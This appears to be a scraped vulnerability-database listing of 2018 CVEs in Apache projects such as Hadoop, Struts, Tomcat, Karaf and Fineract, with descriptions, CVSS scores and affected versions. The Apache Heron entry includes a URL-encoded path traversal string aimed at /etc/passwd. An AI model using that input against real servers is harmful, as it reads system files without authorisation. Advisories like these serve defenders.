
CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-269,

Products Affected

Vendor Product Version
apache hadoop *
CVE-2018-11768 MEDIUM

In Apache Hadoop 3.1.0 to 3.1.1, 3.0.0-alpha1 to 3.0.3, 2.9.0 to 2.9.1, and 2.0.0-alpha to 2.8.4, the user/group information can be corrupted across storing in fsimage and reading back from fsimage.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache hadoop 2.0.4
apache hadoop 2.0.5
apache hadoop 2.1.0
apache hadoop 2.0.0
apache hadoop 2.0.6
apache hadoop 2.0.3
apache hadoop 2.1.1
apache hadoop 2.0.2
apache hadoop 2.0.1
apache hadoop *
apache hadoop 3.0.0
CVE-2018-11769 HIGH

CouchDB administrative users before 2.2.0 can configure the database server via HTTP(S). Due to insufficient validation of administrator-supplied configuration settings via the HTTP API, it is possible for a CouchDB administrator user to escalate their privileges to that of the operating system's user under which CouchDB runs, by bypassing the blacklist of configuration settings that are not allowed to be modified via the HTTP API. This privilege escalation effectively allows a CouchDB admin user to gain arbitrary remote code execution, bypassing CVE-2017-12636 and CVE-2018-8007.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache couchdb *
CVE-2018-11770 MEDIUM

From version 1.3.0 onward, Apache Spark's standalone master exposes a REST API for job submission, in addition to the submission mechanism used by spark-submit. In standalone, the config property 'spark.authenticate.secret' establishes a shared secret for authenticating requests to submit jobs via spark-submit. However, the REST API does not use this or any other authentication mechanism, and this is not adequately documented. In this case, a user would be able to run a driver program without authenticating, but not launch executors, using the REST API. This REST API is also used by Mesos, when set up to run in cluster mode (i.e., when also running MesosClusterDispatcher), for job submission. Future versions of Spark will improve documentation on these points, and prohibit setting 'spark.authenticate.secret' when running the REST APIs, to make this clear. Future versions will also disable the REST API by default in the standalone master by changing the default value of 'spark.master.rest.enabled' to 'false'.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache spark *
CVE-2018-11771 MEDIUM

When reading a specially crafted ZIP archive, the read method of Apache Commons Compress 1.7 to 1.17's ZipArchiveInputStream can fail to return the correct EOF indication after the end of the stream has been reached. When combined with a java.io.InputStreamReader this can lead to an infinite stream, which can be used to mount a denial of service attack against services that use Compress' zip package.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
oracle weblogic_server 14.1.1.0.0
apache commons_compress *
CVE-2018-11772 MEDIUM

Apache VCL versions 2.1 through 2.5 do not properly validate cookie input when determining what node (if any) was previously selected in the privilege tree. The cookie data is then used in an SQL statement. This allows for an SQL injection attack. Access to this portion of a VCL system requires admin level rights. Other layers of security seem to protect against malicious attack. However, all VCL systems running versions earlier than 2.5.1 should be upgraded or patched. This vulnerability was found and reported to the Apache VCL project by ADLab of Venustech.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache virtual_computing_lab *
CVE-2018-11773 HIGH

Apache VCL versions 2.1 through 2.5 do not properly validate form input when processing a submitted block allocation. The form data is then used as an argument to the php built in function strtotime. This allows for an attack against the underlying implementation of that function. The implementation of strtotime at the time the issue was discovered appeared to be resistant to a malicious attack. However, all VCL systems running versions earlier than 2.5.1 should be upgraded or patched. This vulnerability was found and reported to the Apache VCL project by ADLab of Venustech.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache virtual_computing_lab *
CVE-2018-11774 MEDIUM

Apache VCL versions 2.1 through 2.5 do not properly validate form input when adding and removing VMs to and from hosts. The form data is then used in SQL statements. This allows for an SQL injection attack. Access to this portion of a VCL system requires admin level rights. Other layers of security seem to protect against malicious attack. However, all VCL systems running versions earlier than 2.5.1 should be upgraded or patched. This vulnerability was found and reported to the Apache VCL project by ADLab of Venustech.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache virtual_computing_lab *
CVE-2018-11775 MEDIUM

TLS hostname verification when using the Apache ActiveMQ Client before 5.15.6 was missing which could make the client vulnerable to a MITM attack between a Java application using the ActiveMQ client and the ActiveMQ server. This is now enabled by default.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
oracle flexcube_private_banking 12.0.3.0
apache activemq *
oracle flexcube_private_banking 2.2.0.1
oracle flexcube_private_banking 12.0.1.0
oracle flexcube_private_banking 2.0.0.0
oracle flexcube_private_banking 12.1.0.0
oracle enterprise_repository 12.1.3.0.0
CVE-2018-11776 HIGH

Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts *
netapp active_iq_unified_manager *
oracle enterprise_manager_base_platform 13.4.0.0
netapp oncommand_insight -
oracle mysql_enterprise_monitor *
oracle communications_policy_management *
netapp snapcenter -
netapp oncommand_workflow_automation -
oracle enterprise_manager_base_platform 13.3.0.0
CVE-2018-11777 MEDIUM

In Apache Hive 2.3.3, 3.1.0 and earlier, local resources on HiveServer2 machines are not properly protected against malicious user if ranger, sentry or sql standard authorizer is not in use.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache hive *
CVE-2018-11778 MEDIUM

UnixAuthenticationService in Apache Ranger 1.2.0 was updated to correctly handle user input to avoid Stack-based buffer overflow. Versions prior to 1.2.0 should be upgraded to 1.2.0

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache ranger *
CVE-2018-11779 HIGH

In Apache Storm versions 1.1.0 to 1.2.2, when the user is using the storm-kafka-client or storm-kafka modules, it is possible to cause the Storm UI daemon to deserialize user provided bytes into a Java class.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,CWE-502,

Products Affected

Vendor Product Version
apache storm *
CVE-2018-11780 HIGH

A potential Remote Code Execution bug exists with the PDFInfo plugin in Apache SpamAssassin before 3.4.2.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache spamassassin *
canonical ubuntu_linux 16.04
canonical ubuntu_linux 18.04
canonical ubuntu_linux 14.04
pdfinfo_project pdfinfo -
debian debian_linux 8.0
CVE-2018-11781 MEDIUM

Apache SpamAssassin 3.4.2 fixes a local user code injection in the meta rule syntax.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-94,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache spamassassin *
canonical ubuntu_linux 16.04
canonical ubuntu_linux 18.04
canonical ubuntu_linux 14.04
redhat enterprise_linux_server_eus 7.5
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_workstation 7.0
debian debian_linux 8.0
redhat enterprise_linux_server 7.0
CVE-2018-11782 MEDIUM

In Apache Subversion versions up to and including 1.9.10, 1.10.4, 1.12.0, Subversion's svnserve server process may exit when a well-formed read-only request produces a particular answer. This can lead to disruption for users of the server.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache subversion 1.12.0
apache subversion *
CVE-2018-11783 MEDIUM

sslheaders plugin extracts information from the client certificate and sets headers in the request based on the configuration of the plugin. The plugin doesn't strip the headers from the request in some scenarios. This problem was discovered in versions 6.0.0 to 6.0.3, 7.0.0 to 7.1.5, and 8.0.0 to 8.0.1.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2018-11784 MEDIUM

When the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g. redirecting to '/foo/' when the user requested '/foo') a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-601,

Products Affected

Vendor Product Version
oracle secure_global_desktop 5.4
redhat enterprise_linux_server_tus 7.6
oracle instantis_enterprisetrack 17.1
oracle hospitality_guest_access 4.2.1
apache tomcat *
canonical ubuntu_linux 14.04
oracle communications_application_session_controller 3.7.1
oracle hospitality_guest_access 4.2.0
oracle instantis_enterprisetrack 17.3
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
oracle retail_order_broker 15.0
netapp snap_creator_framework -
redhat enterprise_linux_server 7.6
oracle retail_order_broker 5.1
debian debian_linux 8.0
canonical ubuntu_linux 16.04
apache tomcat 9.0.0
redhat enterprise_linux_server_eus 7.6
oracle instantis_enterprisetrack 17.2
oracle communications_application_session_controller 3.8.0
oracle retail_order_broker 5.2
redhat enterprise_linux_server 7.0
CVE-2018-11785 MEDIUM

Missing authorization check in Apache Impala before 3.0.1 allows a Kerberos-authenticated but unauthorized user to inject random data into a running query, leading to wrong results for a query.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,

Products Affected

Vendor Product Version
apache impala *
CVE-2018-11786 HIGH

In Apache Karaf prior to 4.2.0 release, if the sshd service in Karaf is left on so an administrator can manage the running instance, any user with rights to the Karaf console can pivot and read/write any file on the file system to which the Karaf process user has access. This can be locked down a bit by using chroot to change the root directory to protect files outside of the Karaf install directory; it can be further locked down by defining a security manager policy that limits file system access to those directories beneath the Karaf home that are necessary for the system to run. However, this still allows anyone with ssh access to the Karaf process to read and write a large number of files as the Karaf process user.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-269,

Products Affected

Vendor Product Version
apache karaf *
CVE-2018-11787 MEDIUM

In Apache Karaf version prior to 3.0.9, 4.0.9, 4.1.1, when the webconsole feature is installed in Karaf, it is available at .../system/console and requires authentication to access it. One part of the console is a Gogo shell/console that gives access to the command line console of Karaf via a Web browser, and when navigated to it is available at .../system/console/gogo. Trying to go directly to that URL does require authentication. And optional bundle that some applications use is the Pax Web Extender Whiteboard, it is part of the pax-war feature and perhaps others. When it is installed, the Gogo console becomes available at another URL .../gogo/, and that URL is not secured giving access to the Karaf console to unauthenticated users. A mitigation for the issue is to manually stop/uninstall Gogo plugin bundle that is installed with the webconsole feature, although of course this removes the console from the .../system/console application, not only from the unauthenticated endpoint. One could also stop/uninstall the Pax Web Extender Whiteboard, but other components/applications may require it and so their functionality would be reduced/compromised.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache karaf 4.0.0
apache karaf *
CVE-2018-11788 HIGH

Apache Karaf provides a features deployer, which allows users to "hot deploy" a features XML by dropping the file directly in the deploy folder. The features XML is parsed by XMLInputFactory class. Apache Karaf XMLInputFactory class doesn't contain any mitigation codes against XXE. This is a potential security risk as an user can inject external XML entities in Apache Karaf version prior to 4.1.7 or 4.2.2. It has been fixed in Apache Karaf 4.1.7 and 4.2.2 releases.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache karaf *
apache karaf 4.2.0
CVE-2018-11789 HIGH

When accessing the heron-ui webpage, people can modify the file paths outside of the current container to access any file on the host. Example woule be modifying the parameter path= to go to the directory you would like to view. i.e. ..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache heron *
CVE-2018-11790 MEDIUM

When loading a document with Apache Open Office 4.1.5 and earlier with smaller end line termination than the operating system uses, the defect occurs. In this case OpenOffice runs into an Arithmetic Overflow at a string length calculation.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-682,

Products Affected

Vendor Product Version
canonical ubuntu_linux 16.04
apache openoffice *
canonical ubuntu_linux 14.04
CVE-2018-11792 HIGH

In Apache Impala before 3.0.1, ALTER TABLE/VIEW RENAME required ALTER on the old table. This may pose a potential security risk, such as having ALTER on a table and ALL on a particular database allows a user to move the table to a database with ALL, which will automatically grant that user with ALL privilege on that table due to the privilege inherited from the database.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-732,

Products Affected

Vendor Product Version
apache impala *
CVE-2018-11793 MEDIUM

When parsing a JSON payload with deeply nested JSON structures, the parser in Apache Mesos versions pre-1.4.x, 1.4.0 to 1.4.2, 1.5.0 to 1.5.1, 1.6.0 to 1.6.1, and 1.7.0 might overflow the stack due to unbounded recursion. A malicious actor can therefore cause a denial of service of Mesos masters rendering the Mesos-controlled cluster inoperable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache mesos *
apache mesos 1.8.0
apache mesos 1.4.0
CVE-2018-11796 MEDIUM

In Apache Tika 1.19 (CVE-2018-11761), we added an entity expansion limit for XML parsing. However, Tika reuses SAXParsers and calls reset() after each parse, which, for Xerces2 parsers, as per the documentation, removes the user-specified SecurityManager and thus removes entity expansion limits after the first parse. Apache Tika versions from 0.1 to 1.19 are therefore still vulnerable to entity expansions which can lead to a denial of service attack. Users should upgrade to 1.19.1 or later.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache tika *
CVE-2018-11797 MEDIUM

In Apache PDFBox 1.8.0 to 1.8.15 and 2.0.0RC1 to 2.0.11, a carefully crafted PDF file can trigger an extremely long running computation when parsing the page tree.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache pdfbox 2.0
apache pdfbox 2.0.0
fedoraproject fedora 30
oracle retail_xstore_point_of_service 17.0
apache pdfbox *
fedoraproject fedora 29
CVE-2018-11798 MEDIUM

The Apache Thrift Node.js static web server in versions 0.9.2 through 0.11.0 have been determined to contain a security vulnerability in which a remote user has the ability to access files outside the set webservers docroot path.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-538,

Products Affected

Vendor Product Version
apache thrift *
CVE-2018-11799 MEDIUM

Vulnerability allows a user of Apache Oozie 3.1.3-incubating to 5.0.0 to impersonate other users. The malicious user can construct an XML that results workflows running in other user's name.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache oozie 3.1.3
apache oozie *
CVE-2018-11800 HIGH

SQL injection vulnerability in Apache Fineract before 1.3.0 allows attackers to execute arbitrary SQL commands via a query on the GroupSummaryCounts related table.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache fineract *
CVE-2018-11801 HIGH

SQL injection vulnerability in Apache Fineract before 1.3.0 allows attackers to execute arbitrary SQL commands via a query on a m_center data related table.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache fineract *
CVE-2018-11802 MEDIUM

In Apache Solr, the cluster can be partitioned into multiple collections and only a subset of nodes actually host any given collection. However, if a node receives a request for a collection it does not host, it proxies the request to a relevant node and serves the request. Solr bypasses all authorization settings for such requests. This affects all Solr versions prior to 7.7 that use the default authorization mechanism of Solr (RuleBasedAuthorizationPlugin).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache solr *
CVE-2018-11803 MEDIUM

Subversion's mod_dav_svn Apache HTTPD module versions 1.11.0 and 1.10.0 to 1.10.3 will crash after dereferencing an uninitialized pointer if the client omits the root path in a recursive directory listing operation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-824,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.10
apache subversion 1.11.0
apache subversion *
CVE-2018-11804 MEDIUM

Spark's Apache Maven-based build includes a convenience script, 'build/mvn', that downloads and runs a zinc server to speed up compilation. It has been included in release branches since 1.3.x, up to and including master. This server will accept connections from external hosts by default. A specially-crafted request to the zinc server could cause it to reveal information in files readable to the developer account running the build. Note that this issue does not affect end users of Spark, only developers building Spark from source code.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache spark *
CVE-2018-11805 HIGH

In Apache SpamAssassin before 3.4.3, nefarious CF files can be configured to run system commands without any output or errors. With this, exploits can be injected in a number of scenarios. In addition to upgrading to SA 3.4.3, we recommend that users should only use update channels or 3rd party .cf files from trusted places.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.7 MEDIUM CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache spamassassin *
debian debian_linux 9.0
debian debian_linux 10.0
debian debian_linux 8.0
CVE-2018-1273 HIGH

Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5, and older unsupported versions, contain a property binder vulnerability caused by improper neutralization of special elements. An unauthenticated remote malicious user (or attacker) can supply specially crafted request parameters against Spring Data REST backed HTTP resources or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,NVD-CWE-Other,

Products Affected

Vendor Product Version
apache ignite *
pivotal_software spring_data_commons *
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
pivotal_software spring_data_rest *
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
apache ignite 1.0.0
CVE-2018-1281 MEDIUM

The clustered setup of Apache MXNet allows users to specify which IP address and port the scheduler will listen on via the DMLC_PS_ROOT_URI and DMLC_PS_ROOT_PORT env variables. In versions older than 1.0.0, however, the MXNet framework will listen on 0.0.0.0 rather than user specified DMLC_PS_ROOT_URI once a scheduler node is initialized. This exposes the instance running MXNet to any attackers reachable via the interface they didn't expect to be listening on. For example: If a user wants to run a clustered setup locally, they may specify to run on 127.0.0.1. But since MXNet will listen on 0.0.0.0, it makes the port accessible on all network interfaces.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache mxnet *
CVE-2018-1282 HIGH

This vulnerability in Apache Hive JDBC driver 0.7.1 to 2.3.2 allows carefully crafted arguments to be used to bypass the argument escaping/cleanup that JDBC driver does in PreparedStatement implementation.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache hive *
CVE-2018-1283 LOW

In Apache httpd 2.4.0 to 2.4.29, when mod_session is configured to forward its session data to CGI applications (SessionEnv on, not the default), a remote user may influence their content by using a "Session" header. This comes from the "HTTP_SESSION" variable name used by mod_session to forward its data to CGIs, since the prefix "HTTP_" is also used by the Apache HTTP Server to pass HTTP header fields, per CGI specifications.

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.04
netapp storage_automation_store -
debian debian_linux 9.0
netapp santricity_cloud_connector -
netapp clustered_data_ontap -
debian debian_linux 8.0
canonical ubuntu_linux 17.10
redhat enterprise_linux 6.0
redhat enterprise_linux 7.0
redhat enterprise_linux 7.5
canonical ubuntu_linux 16.04
redhat enterprise_linux 7.4
canonical ubuntu_linux 14.04
redhat enterprise_linux 7.6
netapp storagegrid -
CVE-2018-1284 MEDIUM

In Apache Hive 0.6.0 to 2.3.2, malicious user might use any xpath UDFs (xpath/xpath_string/xpath_boolean/xpath_number/xpath_double/xpath_float/xpath_long/xpath_int/xpath_short) to expose the content of a file on the machine running HiveServer2 owned by HiveServer2 user (usually hive) if hive.server2.enable.doAs=false.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache hive *
CVE-2018-1285 HIGH

Apache log4net versions before 2.0.10 do not disable XML external entities when parsing log4net configuration files. This allows for XXE-based attacks in applications that accept attacker-controlled log4net configuration files.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
fedoraproject fedora 32
oracle application_testing_suite 13.3.0.1
fedoraproject fedora 31
oracle hospitality_simphony 19.1.3
apache log4net *
fedoraproject fedora 30
netapp manageability_software_development_kit -
netapp snapcenter -
oracle hospitality_opera_5 5.6
oracle hospitality_simphony 18.2.7.2
oracle hospitality_opera_5 5.5
CVE-2018-1286 MEDIUM

In Apache OpenMeetings 3.0.0 - 4.0.1, CRUD operations on privileged users are not password protected allowing an authenticated attacker to deny service for privileged users.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2018-1287 HIGH

In Apache JMeter 2.X and 3.X, when using Distributed Test only (RMI based), jmeter server binds RMI Registry to wildcard host. This could allow an attacker to get Access to JMeterEngine and send unauthorized code.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache jmeter 2.4
apache jmeter 2.5
apache jmeter 2.11
apache jmeter 2.3.3
apache jmeter 2.5.1
apache jmeter 3.2
apache jmeter 2.10
apache jmeter 2.3.2
apache jmeter 2.1
apache jmeter 2.13
apache jmeter 2.7
apache jmeter 2.6
apache jmeter 3.0
apache jmeter 3.3
apache jmeter 2.3
apache jmeter 2.2
apache jmeter 2.9
apache jmeter 3.1
apache jmeter 2.12
apache jmeter 2.3.1
apache jmeter 2.8
apache jmeter 2.3.4
CVE-2018-1288 MEDIUM

In Apache Kafka 0.9.0.0 to 0.9.0.1, 0.10.0.0 to 0.10.2.1, 0.11.0.0 to 0.11.0.2, and 1.0.0, authenticated Kafka users may perform action reserved for the Broker via a manually created fetch request interfering with data replication, resulting in data loss.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L 2.8 2.5

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle database 11.2.0.4
oracle primavera_p6_enterprise_project_portfolio_management *
oracle timesten_in-memory_database *
oracle database 19c
oracle database 12.2.0.1
oracle database 18c
redhat jboss_middleware_text-only_advisories 1.0
apache kafka *
oracle database 12.1.0.2
apache kafka 1.0.0
CVE-2018-1289 MEDIUM

In Apache Fineract versions 1.0.0, 0.6.0-incubating, 0.5.0-incubating, 0.4.0-incubating, the system exposes different REST end points to query domain specific entities with a Query Parameter 'orderBy' and 'sortOrder' which are appended directly with SQL statements. A hacker/user can inject/draft the 'orderBy' and 'sortOrder' query parameter in such a way to read/update the data for which he doesn't have authorization.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache fineract 0.4.0
apache fineract 1.0.0
apache fineract 0.6.0
apache fineract 0.5.0
CVE-2018-1290 HIGH

In Apache Fineract versions 1.0.0, 0.6.0-incubating, 0.5.0-incubating, 0.4.0-incubating, Using a single quotation escape with two continuous SQL parameters can cause a SQL injection. This could be done in Methods like retrieveAuditEntries of AuditsApiResource Class and retrieveCommands of MakercheckersApiResource Class.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache fineract 0.4.0
apache fineract 1.0.0
apache fineract 0.6.0
apache fineract 0.5.0
CVE-2018-1291 MEDIUM

Apache Fineract 1.0.0, 0.6.0-incubating, 0.5.0-incubating, 0.4.0-incubating exposes different REST end points to query domain specific entities with a Query Parameter 'orderBy' which are appended directly with SQL statements. A hacker/user can inject/draft the 'orderBy' query parameter by way of the "order" param in such a way to read/update the data for which he doesn't have authorization.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache fineract 0.4.0
apache fineract 1.0.0
apache fineract 0.6.0
apache fineract 0.5.0
CVE-2018-1292 MEDIUM

Within the 'getReportType' method in Apache Fineract 1.0.0, 0.6.0-incubating, 0.5.0-incubating, 0.4.0-incubating, a hacker could inject SQL to read/update data for which he doesn't have authorization for by way of the 'reportName' parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache fineract 0.4.0
apache fineract 1.0.0
apache fineract 0.6.0
apache fineract 0.5.0
CVE-2018-1294 MEDIUM

If a user of Apache Commons Email (typically an application programmer) passes unvalidated input as the so-called "Bounce Address", and that input contains line-breaks, then the email details (recipients, contents, etc.) might be manipulated. Mitigation: Users should upgrade to Commons-Email 1.5. You can mitigate this vulnerability for older versions of Commons Email by stripping line-breaks from data, that will be passed to Email.setBounceAddress(String).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache commons_email *
CVE-2018-1295 HIGH

In Apache Ignite 2.3 or earlier, the serialization mechanism does not have a list of classes allowed for serialization/deserialization, which makes it possible to run arbitrary code when 3-rd party vulnerable classes are present in Ignite classpath. The vulnerability can be exploited if the one sends a specially prepared form of a serialized object to one of the deserialization endpoints of some Ignite components - discovery SPI, Ignite persistence, Memcached endpoint, socket steamer.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache ignite *
CVE-2018-1296 MEDIUM

In Apache Hadoop 3.0.0-alpha1 to 3.0.0, 2.9.0, 2.8.0 to 2.8.3, and 2.5.0 to 2.7.5, HDFS exposes extended attribute key/value pairs during listXAttrs, verifying only path-level search access to the directory rather than path-level read permission to the referent.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache hadoop 2.8.1
apache hadoop 2.8.2
apache hadoop 2.8.3
apache hadoop 2.8.0
apache hadoop *
apache hadoop 3.0.0
apache hadoop 2.9.0
CVE-2018-1297 HIGH

When using Distributed Test only (RMI based), Apache JMeter 2.x and 3.x uses an unsecured RMI connection. This could allow an attacker to get Access to JMeterEngine and send unauthorized code.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-319,

Products Affected

Vendor Product Version
apache jmeter 2.4
apache jmeter 2.5
apache jmeter 2.11
apache jmeter 2.3.3
apache jmeter 2.5.1
apache jmeter 3.2
apache jmeter 2.10
apache jmeter 2.3.2
apache jmeter 2.1
apache jmeter 2.13
apache jmeter 2.7
apache jmeter 2.6
apache jmeter 3.0
apache jmeter 3.3
apache jmeter 2.3
apache jmeter 2.2
apache jmeter 2.9
apache jmeter 3.1
apache jmeter 2.12
apache jmeter 2.3.1
apache jmeter 2.8
apache jmeter 2.3.4
CVE-2018-1298 MEDIUM

A Denial of Service vulnerability was found in Apache Qpid Broker-J 7.0.0 in functionality for authentication of connections for AMQP protocols 0-8, 0-9, 0-91 and 0-10 when PLAIN or XOAUTH2 SASL mechanism is used. The vulnerability allows unauthenticated attacker to crash the broker instance. AMQP 1.0 and HTTP connections are not affected. An authentication of incoming AMQP connections in Apache Qpid Broker-J is performed by special entities called "Authentication Providers". Each Authentication Provider can support several SASL mechanisms which are offered to the connecting clients as part of SASL negotiation process. The client chooses the most appropriate SASL mechanism for authentication. Authentication Providers of following types supports PLAIN SASL mechanism: Plain, PlainPasswordFile, SimpleLDAP, Base64MD5PasswordFile, MD5, SCRAM-SHA-256, SCRAM-SHA-1. XOAUTH2 SASL mechanism is supported by Authentication Providers of type OAuth2. If an AMQP port is configured with any of these Authentication Providers, the Broker may be vulnerable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache qpid_broker-j 7.0.0
CVE-2018-1299 MEDIUM

In Apache Allura before 1.8.0, unauthenticated attackers may retrieve arbitrary files through the Allura web application. Some webservers used with Allura, such as Nginx, Apache/mod_wsgi or paster may prevent the attack from succeeding. Others, such as gunicorn do not prevent it and leave Allura vulnerable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache allura *
CVE-2018-1301 MEDIUM

A specially crafted request could have crashed the Apache HTTP Server prior to version 2.4.30, due to an out of bound access after a size limit is reached by reading the HTTP header. This vulnerability is considered very hard if not impossible to trigger in non-debug mode (both log and build level), so it is classified as low risk for common server usage.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.04
netapp storage_automation_store -
